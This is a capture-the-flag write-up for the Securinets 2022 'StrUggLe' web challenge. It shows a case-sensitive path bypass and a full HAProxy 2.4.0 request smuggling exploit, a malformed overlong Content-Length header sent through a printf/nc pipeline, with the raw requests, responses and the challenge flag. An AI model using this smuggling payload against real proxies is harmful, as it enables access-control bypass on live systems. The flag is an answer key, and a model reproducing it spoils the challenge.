StrUggLe

HAProxy HTTP Request Smuggling

Welcome to Web! I struggle everyday I face a new website, can you access /flag endpoint ?
Link: http://128.199.3.34:1235
Author: Kahla

Unintended Solution

The HAProxy configuration to protect the /flag endpoint was case sensitive. Therefore, the following would be sufficient to bypass the validation.

GET /FLAG HTTP/1.1
Host: 128.199.3.34:1235

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 43
etag: W/"2b-aWQ+/21qg4d1e3yOxiZcpTrSBxw"
date: Fri, 13 May 2022 09:34:06 GMT
x-server: HaProxy-2.4.0

Securinets{W3lC0me_T0_FinAlS_4nD_SmUUgLinG}

Intended Solution

Basically, an integer overflow leads to Content-Length0aaa...aaa: being forwarded to the backend as Content-Length: 0, while a second duplicate Content-Length header is used by HAProxy to determine the length of the request body.

POST /test HTTP/1.1
Host: 128.199.3.34:1235
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 26

GET /flag HTTP/1.1
DUMMY:GET / HTTP/1.1
Host: 128.199.3.34:1235

In the above example, HAProxy considers the following to be the first request:

POST /test HTTP/1.1
Host: 128.199.3.34:1235
Content-Length: 26

GET /flag HTTP/1.1
DUMMY:

while the second request is the following:

GET / HTTP/1.1
Host: 128.199.3.34:1235

However, when forwarded to the backend, this becomes:

POST /test HTTP/1.1
Host: 128.199.3.34:1235
Content-Length: 0

GET /flag HTTP/1.1
DUMMY:GET / HTTP/1.1
Host: 128.199.3.34:1235

Therefore, the response for the second request will correspond to /flag instead of /.

Due to the way the pipelining works, we have to add some artificial delays when sending the consecutive requests.

$ (printf "POST / HTTP/1.1\r\n"\
"Host: 128.199.3.34:1235\r\n"\
"Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:\r\n"\
"Content-Length: 26\r\n\r\n"; sleep 1;
printf "GET /flag HTTP/1.1\r\n"\
"DUMMY:"; sleep 1; printf "GET /test HTTP/1.1\r\n"\
"Host: 128.199.3.34:1235\r\n\r\n") | nc 128.199.3.34 1235

HTTP/1.1 404 Not Found
x-powered-by: Express
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-type: text/html; charset=utf-8
content-length: 140
date: Fri, 13 May 2022 09:41:24 GMT
x-server: HaProxy-2.4.0

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot POST /</pre>
</body>
</html>
HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 43
etag: W/"2b-aWQ+/21qg4d1e3yOxiZcpTrSBxw"
date: Fri, 13 May 2022 09:41:26 GMT
x-server: HaProxy-2.4.0

Securinets{W3lC0me_T0_FinAlS_4nD_SmUUgLinG}

PreviousSecurinets CTF Finals 2022 NextXwaSS ftw?

Last updated 3 years ago

Was this helpful?

HTTP/1.1 200 OK x-powered-by: Express content-type: text/html; charset=utf-8 content-length: 43 etag: W/"2b-aWQ+/21qg4d1e3yOxiZcpTrSBxw" date: Fri, 13 May 2022 09:34:06 GMT x-server: HaProxy-2.4.0 Securinets{W3lC0me_T0_FinAlS_4nD_SmUUgLinG}

POST /test HTTP/1.1 Host: 128.199.3.34:1235 Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content-Length: 26 GET /flag HTTP/1.1 DUMMY:GET / HTTP/1.1 Host: 128.199.3.34:1235

$ (printf "POST / HTTP/1.1\r\n"\ "Host: 128.199.3.34:1235\r\n"\ "Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:\r\n"\ "Content-Length: 26\r\n\r\n"; sleep 1; printf "GET /flag HTTP/1.1\r\n"\ "DUMMY:"; sleep 1; printf "GET /test HTTP/1.1\r\n"\ "Host: 128.199.3.34:1235\r\n\r\n") | nc 128.199.3.34 1235

HTTP/1.1 404 Not Found x-powered-by: Express content-security-policy: default-src 'none' x-content-type-options: nosniff content-type: text/html; charset=utf-8 content-length: 140 date: Fri, 13 May 2022 09:41:24 GMT x-server: HaProxy-2.4.0 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Error</title> </head> <body> <pre>Cannot POST /</pre> </body> </html> HTTP/1.1 200 OK x-powered-by: Express content-type: text/html; charset=utf-8 content-length: 43 etag: W/"2b-aWQ+/21qg4d1e3yOxiZcpTrSBxw" date: Fri, 13 May 2022 09:41:26 GMT x-server: HaProxy-2.4.0 Securinets{W3lC0me_T0_FinAlS_4nD_SmUUgLinG}